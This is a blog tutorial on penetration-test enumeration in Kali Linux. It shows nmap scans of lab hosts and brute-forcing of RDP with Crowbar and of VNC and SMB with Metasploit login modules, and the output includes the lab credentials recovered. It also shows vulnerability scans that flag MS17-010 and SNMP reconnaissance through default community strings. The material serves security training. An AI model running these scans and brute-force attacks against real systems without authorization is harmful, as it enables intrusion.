In the first part of the comprehensive training of the Advanced Enumeration Phase in Kali Linux, FTP, SSH, and Telnet services were investigated and identified. In the second part of the advanced identification training in Kali Linux, SMTP, POP3, IMAP4, Microsoft SQL, Oracle Database Server, MySQL, Docker Engine, and Jenkins services were investigated and identified.
Web Protocols 80/447
Web applications are everything these days, which is why a dedicated chapter is dedicated to identifying and exploiting web applications. In the previous section, you learned how to use Burp Suite to intercept web requests and brute-force a web application using Hydra. By now, you should notice that most web servers use two ports to service the web application (by default):
- HTTP TCP port 80: This port serves web requests and responses in plaintext (cleartext). If you simulate the network of a website serving on port 80, you will be able to see credentials in plain text.
- HTTPS/TLS TCP port 443: The secure HTTP protocol is known as HTTPS or TLS. In this protocol, communication is secure, and a sniffer will not be able to see traffic unless there is a proxy that intercepts the traffic. Large companies use proxies and inject certificates into their users' systems so that they can monitor their employees' HTTPS traffic.
Note: Web portals like Jenkins, for example, don't use the default 80 port to avoid interfering with the default web application hosted on the same web server.
Remote Graphical Access Protocols
Connecting to the GUI remotely is easy on Windows and Linux systems these days. In this section, you'll learn how to identify a remote access protocol service and test it like a pro. These are the most common applications used for this purpose:
■ Remote Desktop Protocol (RDP): TCP port 3389
■ Virtual Network Computing (VNC): TCP port 5900
RDP (Port 3389)
The Remote Desktop Protocol is a common application used to remotely connect to Windows operating systems. If enabled on the remote host, users can connect to the graphical user interface of the Windows host. Note that the RDP server is listening on port 3389 to do this. Let's quickly scan a host running an RDP server:
root@kali:~# nmap -sV -sC -O -T5 -p 3389 172.16.0.104 Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-16 10:04 EDT Nmap scan report for 172.16.0.104 Host is up (0.00056s latency). PORT STATE SERVICE VERSION 3389/tcp open ms-wbt-server Microsoft Terminal Services | rdp-ntlm-info: | Target_Name: KCORP | NetBIOS_Domain_Name: KCORP | NetBIOS_Computer_Name: WINDOWS10LAB | DNS_Domain_Name: KCorp.local | DNS_Computer_Name: Windows10Lab.KCorp.local | DNS_Tree_Name: KCorp.local | Product_Version: 10.0.17763 |_ System_Time: 2020-06-16T14:04:26+00:00 | ssl-cert: Subject: commonName=Windows10Lab.KCorp.local [...]
RDP Brute-Force
The RDP protocol is a relatively slow one, and Hydra does not perform optimally in the RDP protocol. Crowbar, on the other hand, has proven to perform slightly better than Hydra in the Brute-Force RDP service. Let's see a practical example of the same server that we identified earlier using Hydra, using Crowbar (you need to install it with the command first):apt install crowbar -y
root@kali:/# crowbar -b rdp -s 172.16.0.104/32 -u admin -C /root/pass.txt 2020-06-16 14:08:26 START 2020-06-16 14:08:26 Crowbar v0.4.1 2020-06-16 14:08:26 Trying 172.16.0.104:3389 2020-06-16 14:08:26 RDP-SUCCESS : 172.16.0.104:3389 - admin:Password123! 2020-06-16 14:08:26 STOP
VNC (Port 5900)
nmap -sV -T5 -p 5900 --script=vnc* 172.16.0.101 Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-16 15:14 EDT Nmap scan report for 172.16.0.101 Host is up (0.00025s latency). PORT STATE SERVICE VERSION 5900/tcp open vnc VNC (protocol 3.3) | vnc-brute: | Accounts: No valid accounts found | Statistics: Performed 15 guesses in 1 seconds, average tps: 15.0 |_ ERROR: Too many authentication failures | vnc-info: | Protocol version: 3.3 | Security types: |_ VNC Authentication (2) [...]
Nmap doesn't show us much information; we were only able to identify the VNC version. For Brute-Force VNC, we'll be using Metasploit. (In the past, I have had more successful results with the MSF module instead of Hydra.) Note that you don't need a username to infiltrate your VNC account. All you need is a password:
msf5 > use auxiliary/scanner/vnc/vnc_login msf5 auxiliary(scanner/vnc/vnc_login) > set RHOSTS 172.16.0.101 RHOSTS => 172.16.0.101 msf5 auxiliary(scanner/vnc/vnc_login) > set VERBOSE false VERBOSE => false msf5 auxiliary(scanner/vnc/vnc_login) > set STOP_ON_SUCCESS true STOP_ON_SUCCESS => true msf5 auxiliary(scanner/vnc/vnc_login) > run [*] 172.16.0.101:5900 - 172.16.0.101:5900 - Starting VNC login sweep [+] 172.16.0.101:5900 - 172.16.0.101:5900 - Login Successful: :password [*] 172.16.0.101:5900 - Scanned 1 of 1 hosts (100% complete) [...]
File Sharing Protocols
The Server Message Block (SMB) and NetBIOS protocols are the heart of file sharing on Microsoft Windows operating systems. The Samba protocol is derived from SMB, and you'll often hear the two terms interchangeably. Samba is not only widely used in Windows operating systems, but also in Linux operating systems for file sharing and printing services.
SMB (Port 445)
The SMB protocol works on TCP port 445, and as soon as it's activated, you'll see that TCP port 139 corresponding to NetBIOS is also open. The SMB protocol identification process should look for the following:
- Subscription Names
- User List
- List of Groups
- Domain Name
- Brute-Force Accounts
- List of SMB Vulnerable Versions
A quick scan with Nmap should give you basic information about the target host:
root@kali:~# nmap -sV -T5 -p 445 -sC 172.16.0.106 Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-18 09:36 EDT Nmap scan report for 172.16.0.106 Host is up (0.00072s latency). PORT STATE SERVICE VERSION 445/tcp open microsoft-ds Windows 10 Pro 10240 microsoft-ds (workgroup: KCORP) MAC Address: 00:0C:29:87:09:90 (VMware) Service Info: Host: WINDOWS10LAB02; OS: Windows; CPE: cpe:/ o:microsoft:windows Host script results: |_clock-skew: mean: 2h19m59s, deviation: 4h02m29s, median: 0s |_nbstat: NetBIOS name: WINDOWS10LAB02, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:87:09:90 (VMware) | smb-os-discovery: | OS: Windows 10 Pro 10240 (Windows 10 Pro 6.3) | OS CPE: cpe:/o:microsoft:windows_10::- | Computer name: Windows10Lab02 | NetBIOS computer name: WINDOWS10LAB02\x00 | Domain name: KCorp.local | Forest name: KCorp.local | FQDN: Windows10Lab02.KCorp.local |_ System time: 2020-06-18T06:36:19-07:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-06-18T13:36:19 |_ start_date: 2020-06-18T13:32:18
Next, we can run a vulnerability scan using Nmap scripts to see if we can get more information (I didn't use them, as these scripts are time-consuming and risky):smb*
root@kali:~# nmap -sV -p 445 --script=smb-vuln* 172.16.0.106 Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-18 10:27 EDT Nmap scan report for 172.16.0.106 Host is up (0.00025s latency). PORT STATE SERVICE VERSION 445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: KCORP) MAC Address: 00:0C:29:87:09:90 (VMware) Service Info: Host: WINDOWS10LAB02; OS: Windows; CPE: cpe:/ o:microsoft:windows Host script results: |_smb-vuln-ms10-054: false |_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED | smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). | | Disclosure date: 2017-03-14 | References: | https://technet.microsoft.com/en-us/library/security/ms17-010. aspx | https://blogs.technet.microsoft.com/msrc/2017/05/12/customerguidance-for-wannacrypt-attacks/ |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 11.49 seconds
We will test whether the remote host is vulnerable to the MS17-010 vulnerability in the following articles. At the moment, we are only collecting information. (These positive results may be false, so you shouldn't count on the accuracy of the results in this step.) Note that you can use the script option to add more results to the counting phase:smb-enum
root@kali:~# nmap -sV -p 445 --script=smb-enum 172.16.0.106
If you want to try more tools for this purpose, I suggest you also test the SMB counting tool called Enum4Linux:
$ enum4linux -a [IP address]
Brute-Forcing SMB
We can use the auxiliary module in Metasploit for the SMB protocol instead of Hydra, as this module provides fewer false positives and performs better. To get the desired result, you can adjust your scanner options to avoid wasteful consumption of resources. (The names of the options are self-explanatory.)smb_login
msf5 > use auxiliary/scanner/smb/smb_login msf5 auxiliary(scanner/smb/smb_login) > set BLANK_PASSWORDS true BLANK_PASSWORDS => true msf5 auxiliary(scanner/smb/smb_login) > set PASS_FILE /usr/share/wordlists/rockyou.txt PASS_FILE => /usr/share/wordlists/rockyou.txt msf5 auxiliary(scanner/smb/smb_login) > set RHOSTS 172.16.0.106 RHOSTS => 172.16.0.106 msf5 auxiliary(scanner/smb/smb_login) > set SMBUser admin SMBUser => admin msf5 auxiliary(scanner/smb/smb_login) > set STOP_ON_SUCCESS true STOP_ON_SUCCESS => true msf5 auxiliary(scanner/smb/smb_login) > set THREADS 100 THREADS => 100 msf5 auxiliary(scanner/smb/smb_login) > set USER_AS_PASS true USER_AS_PASS => true msf5 auxiliary(scanner/smb/smb_login) > set VERBOSE false VERBOSE => false msf5 auxiliary(scanner/smb/smb_login) > run [+] 172.16.0.106:445 - 172.16.0.106:445 - Success: '.\admin:admin' [*] 172.16.0.106:445 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf5 auxiliary(scanner/smb/smb_login) >
SNMP (Port UDP 161)
Simple Network Management Protocol (SNMP) is a database that stores information from network devices/hosts for network management purposes. The SNMP Information Database is known as the Management Information Database (MIB) and organizes the data into a tree. The server uses port UDP 161 to expose this information. Previous versions of SNMP, such as versions 1, 2, and 2c, do not use encryption in traffic, so using a sniffing tool we can see credentials in clear text. The SNMP server uses a community string to secure data within the server. You can use the following three community strings to connect to the SNMP server:
■ Public
■ Private
■ Manager
SNMP Enumeration
If you can identify the SNMP server, you can get a lot of information about the target host:
- Network Interfaces
- Listening ports
- System Processes
- Host Hardware Information
- Installed Software
- Local Users
- Shared Folders
This information can be used to plan future attacks or gather useful data to analyze vulnerabilities in the target system. Nmap is my favorite tool for the identification process. So, for the SNMP protocol, I'll use Nmap again to get the job done. Note that I'm using the option because my goal is a UDP port (the results will be plentiful, so I'll shorten some of the results):-sU
root@kali:~# nmap -sU -p 161 -sV -sC -T5 172.16.0.100 Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-05 12:39 EST Nmap scan report for 172.16.0.100 Host is up (0.00038s latency). PORT STATE SERVICE VERSION 161/udp open snmp SNMPv1 server (public) | snmp-interfaces: | Software Loopback Interface 1\x00 | IP address: 127.0.0.1 Netmask: 255.0.0.0 | Type: softwareLoopback Speed: 1 Gbps | Traffic stats: 0.00 Kb sent, 0.00 Kb received | WAN Miniport (SSTP)\x00 | Type: tunnel Speed: 1 Gbps | Traffic stats: 0.00 Kb sent, 0.00 Kb received [...] | snmp-netstat: | TCP 0.0.0.0:135 0.0.0.0:0 | TCP 0.0.0.0:3389 0.0.0.0:0 | TCP 0.0.0.0:49152 0.0.0.0:0 [...] | snmp-processes: | 1: | Name: System Idle Process | 4: | Name: System | 264: | Name: smss.exe | Path: \SystemRoot\System32\ | 356: | Name: csrss.exe | Path: %SystemRoot%\system32\ | Params: ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:User [...]
Nmap did a fantastic job of showing all the information. In fact, the output is so wide that it will take several pages, so I omitted most of them for clarity. The most important part of the Nmap output is the SNMP server version (V1) as well as the community string used (public). This information will help you know which version of SNMP is being used and that the server is protected using a community string called "public" to access the data. The "public" community string is commonly used in SNMP versions 1 and 2c as the default string for accessing public information, and this can be very useful for intrusion attacks.
Summary
I hope you enjoyed this chapter on service identification. At this stage of penetration testing, we collect all the information about the different types of services. All identified data will be used for the operation of each of these services individually. In the next chapter, you'll learn how to operate these services through a remote shell (and many more).
No comments:
Post a Comment